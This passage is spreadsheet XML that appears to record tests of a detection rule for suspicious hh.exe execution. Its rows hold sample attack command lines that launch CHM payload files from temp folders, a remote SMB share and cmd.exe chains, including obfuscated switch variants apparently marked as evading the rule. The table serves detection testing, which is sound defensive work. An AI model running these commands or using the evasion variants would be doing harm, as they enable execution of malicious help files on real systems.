          <t>hh.exe C:\ProgramData\malicious.chm</t>
        </is>
      </c>
      <c r="F20" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G20" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H20" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I20" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J20" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K20" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" s="42">
      <c r="A21" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B21" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C21" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D21" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E21" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\help_document.chm</t>
        </is>
      </c>
      <c r="F21" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G21" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H21" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I21" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J21" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K21" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" s="42">
      <c r="A22" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B22" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C22" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D22" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E22" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\APPDAT~1\Local\Temp\malicious.chm</t>
        </is>
      </c>
      <c r="F22" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G22" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H22" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I22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2" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K22" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" s="42">
      <c r="A23" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B23" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C23" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D23" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E23" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Windows\System32\oobe\msoobe.chm</t>
        </is>
      </c>
      <c r="F23" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G23" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H23" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I23" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J23" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K23" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" s="42">
      <c r="A24" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B24" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C24" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D24" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E24" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\document.chm</t>
        </is>
      </c>
      <c r="F24" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G24" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H24" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I24" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J24" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K24" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" s="42">
      <c r="A25" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B25" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C25" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D25" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E25" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F25" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G25" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H25" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I25" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J25" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K25" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" s="42">
      <c r="A26" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B26" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C26" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D26" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E26" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F26" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G26" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H26" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I26" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J26" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K26" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" s="42">
      <c r="A27" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B27" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C27" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D27" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E27" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F27" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G27" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H27" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I27" s="43" t="n"/>
      <c r="J27" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K27" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" s="42">
      <c r="A28" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B28" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C28" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D28" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E28" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F28" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G28" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H28" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I28" s="43" t="n"/>
      <c r="J28" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K28" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" s="42">
      <c r="A29" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B29" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C29" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D29" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E29" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update_help.chm</t>
        </is>
      </c>
      <c r="F29" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G29" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H29" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I29" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J29" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K29" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" s="42">
      <c r="A30" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B30" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C30" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D30" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E30" s="44" t="inlineStr">
        <is>
          <t>hh.exe \\192.168.1.100\share\payload.chm</t>
        </is>
      </c>
      <c r="F30" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G30" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H30" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I30" s="44" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J30" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K30" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" s="42">
      <c r="A31" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B31" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C31" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D31" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E31" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update.chm</t>
        </is>
      </c>
      <c r="F31" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G31" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H31" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I31" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J31" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K31" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="32" ht="15.75" customHeight="1" s="42">
      <c r="A32" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B32" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C32" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D32" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E32" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\user\DOWNLO~1\malicious.chm</t>
        </is>
      </c>
      <c r="F32" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G32" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H32" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I32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" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K32" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" s="42">
      <c r="A33" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B33" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C33" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D33" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E33" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\malicious.chm</t>
        </is>
      </c>
      <c r="F33" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G33" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H33" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I33" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J33" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K33" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1" s="42">
      <c r="A34" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B34" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C34" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D34" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E34" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\help_document.chm</t>
        </is>
      </c>
      <c r="F34" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G34" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H34" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I34" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J34" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K34" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="35" ht="15.75" customHeight="1" s="42">
      <c r="A35" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B35" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C35" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D35" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E35" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\APPDAT~1\Local\Temp\malicious.chm</t>
        </is>
      </c>
      <c r="F35" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G35" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H35" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I35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5" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K35" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="36" ht="15.75" customHeight="1" s="42">
      <c r="A36" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B36" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C36" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D36" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E36" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Windows\System32\oobe\msoobe.chm</t>
        </is>
      </c>
      <c r="F36" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G36" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H36" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I36" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J36" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K36" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="37" ht="15.75" customHeight="1" s="42">
      <c r="A37" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B37" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C37" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D37" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E37" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\document.chm</t>
        </is>
      </c>
      <c r="F37" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G37" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H37" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I37" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J37" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K37" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1" s="42">
      <c r="A38" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B38" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C38" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D38" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E38" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F38" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G38" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H38" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I38" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J38" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K38" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" s="42">
      <c r="A39" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B39" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C39" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D39" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E39" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F39" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G39" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H39" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I39" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J39" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K39" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" s="42">
      <c r="A40" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B40" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C40" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D40" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E40" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F40" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G40" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H40" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I40" s="43" t="n"/>
      <c r="J40" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K40" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" s="42">
      <c r="A41" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B41" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C41" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D41" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E41" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F41" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G41" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H41" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I41" s="43" t="n"/>
      <c r="J41" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K41" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" s="42">
      <c r="A42" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B42" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C42" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D42" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E42" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update_help.chm</t>
        </is>
      </c>
      <c r="F42" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G42" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H42" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I42" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J42" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K42" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" s="42">
      <c r="A43" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B43" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C43" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D43" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E43" s="44" t="inlineStr">
        <is>
          <t>hh.exe \\192.168.1.100\share\payload.chm</t>
        </is>
      </c>
      <c r="F43" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G43" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H43" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I43" s="44" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J43" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K43" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="44" ht="15.75" customHeight="1" s="42">
      <c r="A44" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B44" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C44" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D44" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E44" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update.chm</t>
        </is>
      </c>
      <c r="F44" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G44" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H44" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I44" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J44" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K44" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" s="42">
      <c r="A45" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B45" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C45" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D45" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E45" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\user\DOWNLO~1\malicious.chm</t>
        </is>
      </c>
      <c r="F45" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G45" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H45" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I45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45" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K45" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" s="42">
      <c r="A46" s="44" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B46" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C46" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D46" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E46" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\malicious.chm</t>
        </is>
      </c>
      <c r="F46" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G46" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H46" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I46" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J46" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K46" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" s="42">
      <c r="A47" s="44" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B47" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C47" s="44" t="inlineStr">
        <is>
